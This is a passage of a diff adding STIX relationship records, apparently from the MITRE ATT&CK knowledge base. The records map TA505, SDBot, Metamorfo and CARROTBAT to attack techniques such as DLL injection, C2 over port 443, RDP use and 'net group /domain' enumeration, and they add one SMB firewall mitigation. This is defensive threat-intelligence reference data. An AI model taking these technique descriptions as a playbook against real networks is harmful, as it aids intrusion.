+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "source_name": "Microsoft Preventing SMB",
+ "url": "https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections",
+ "description": "Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020."
+ }
+ ],
+ "description": "Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)",
+ "relationship_type": "mitigates",
+ "id": "relationship--6485bfc6-53b5-43c1-9c52-6a35c3fc630d",
+ "type": "relationship",
+ "modified": "2020-06-09T20:56:10.144Z",
+ "created": "2020-06-01T13:16:32.965Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to clean up and remove data structures from a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--08f4dfcb-c394-470d-851f-045bbc38cdb5",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.666Z",
+ "created": "2020-06-01T14:41:54.666Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to delete files from a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f96a2b4a-4d74-4251-b714-40b224d3ad09",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.672Z",
+ "created": "2020-06-01T14:41:54.672Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to inject a downloaded DLL into a newly created rundll32.exe process.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--27ccf817-33de-4d85-85e5-851f82e835e4",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.124Z",
+ "created": "2020-06-01T14:41:54.720Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to identify the user on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9ee385ef-7e78-47bf-be25-8ba112f9280e",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.140Z",
+ "created": "2020-06-01T14:41:54.724Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to get directory listings or drive information on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--03b12a66-789a-4480-8903-deab828d08b6",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.758Z",
+ "created": "2020-06-01T14:41:54.758Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to determine the domain name and whether a proxy is configured on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9c15fad4-3614-4bf0-90db-84749f34f91c",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.762Z",
+ "created": "2020-06-01T14:41:54.762Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to download a DLL from C2 to a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7ef04aca-4890-4035-8c0b-69d9a78e8029",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.770Z",
+ "created": "2020-06-01T14:41:54.770Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to identify the OS version, country code, and computer name.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--855bcd64-ef37-4197-8d3e-2c147d42d774",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.778Z",
+ "created": "2020-06-01T14:41:54.778Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use port forwarding to establish a proxy between a target host and C2.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1a9510e3-0bb0-4469-bbf8-2d02a3a00d66",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.244Z",
+ "created": "2020-06-01T14:41:54.865Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to decrypt and decompress its payload to enable code execution.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--102849c0-0ed7-4e85-9d0b-791bcb7ef7ab",
+ "type": "relationship",
+ "modified": "2020-06-01T16:11:40.376Z",
+ "created": "2020-06-01T14:41:54.872Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use the command shell to execute commands on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--efe5521e-a774-4a0f-a360-3cee8303833d",
+ "type": "relationship",
+ "modified": "2020-06-17T19:40:20.660Z",
+ "created": "2020-06-01T14:41:54.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to communicate with C2 with TCP over port 443.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a7cdf456-9ad0-402b-a914-5f1ebcd873a3",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.876Z",
+ "created": "2020-06-01T14:41:54.876Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to record video on a compromised host.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--88d48848-1f23-4d91-8934-045d04b219ea",
+ "type": "relationship",
+ "modified": "2020-06-01T15:10:44.704Z",
+ "created": "2020-06-01T14:41:54.859Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to access the file system on a compromised host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--76d47356-a255-48ba-9cd8-1ff2e52bb165",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.891Z",
+ "created": "2020-06-01T14:41:54.891Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use RDP to connect to victim's machines.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7aef9a3f-82ff-4e2e-bee7-962b49421067",
+ "type": "relationship",
+ "modified": "2020-06-01T14:41:54.887Z",
+ "created": "2020-06-01T14:41:54.887Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c07d6bad-8249-46c2-971f-66e779229be0",
+ "type": "relationship",
+ "modified": "2020-06-01T14:53:46.735Z",
+ "created": "2020-06-01T14:43:27.315Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--351bb2c4-db16-4c82-9539-3851dd61c608",
+ "type": "relationship",
+ "modified": "2020-06-01T14:43:27.401Z",
+ "created": "2020-06-01T14:43:27.401Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a \"vmdetect.exe\" executable to execute right at the start to identify virtual machines.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--6176ae5b-cd96-4b15-8539-5fb6e230fd5d",
+ "type": "relationship",
+ "modified": "2020-06-01T15:28:39.662Z",
+ "created": "2020-06-01T15:28:39.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used TinyMet to enumerate members of privileged groups.(Citation: IBM TA505 April 2020) [TA505](https://attack.mitre.org/groups/G0092) has also run net group /domain.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9a39a39-b339-41d9-9790-198ac9352bfd",
+ "type": "relationship",
+ "modified": "2020-06-16T16:57:13.559Z",
+ "created": "2020-06-01T15:46:47.567Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used stolen domain admin accounts to compromise additional hosts.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b7a9afc1-3bbf-4eda-9709-5392156c1e41",
+ "type": "relationship",
+ "modified": "2020-06-01T15:46:47.602Z",
+ "created": "2020-06-01T15:46:47.602Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used UPX to obscure malicious code.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--573f3932-8435-4b4a-b138-d9c955495197",
+ "type": "relationship",
+ "modified": "2020-06-01T15:46:47.631Z",
+ "created": "2020-06-01T15:46:47.631Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used HTTP to communiate with C2 nodes.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f8e25c1f-84bd-4ddd-bf18-51543d5cff94",
+ "type": "relationship",
+ "modified": "2020-06-01T15:46:47.636Z",
+ "created": "2020-06-01T15:46:47.636Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has been seen injecting a DLL into winword.exe.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f1459bdf-06ae-435a-8506-1e8e444a410b",
+ "type": "relationship",
+ "modified": "2020-06-15T22:35:29.449Z",
+ "created": "2020-06-01T15:46:47.646Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has used a packed installer file.(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--63ae56fe-04c2-41f5-a2be-c1880e67b490",
+ "type": "relationship",
+ "modified": "2020-06-16T16:43:36.256Z",
+ "created": "2020-06-01T16:11:40.135Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute command line arguments on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--31864818-132a-48c8-ac12-723463d4f8dc",
+ "type": "relationship",
+ "modified": "2020-06-02T15:39:14.511Z",
+ "created": "2020-06-02T15:39:14.510Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
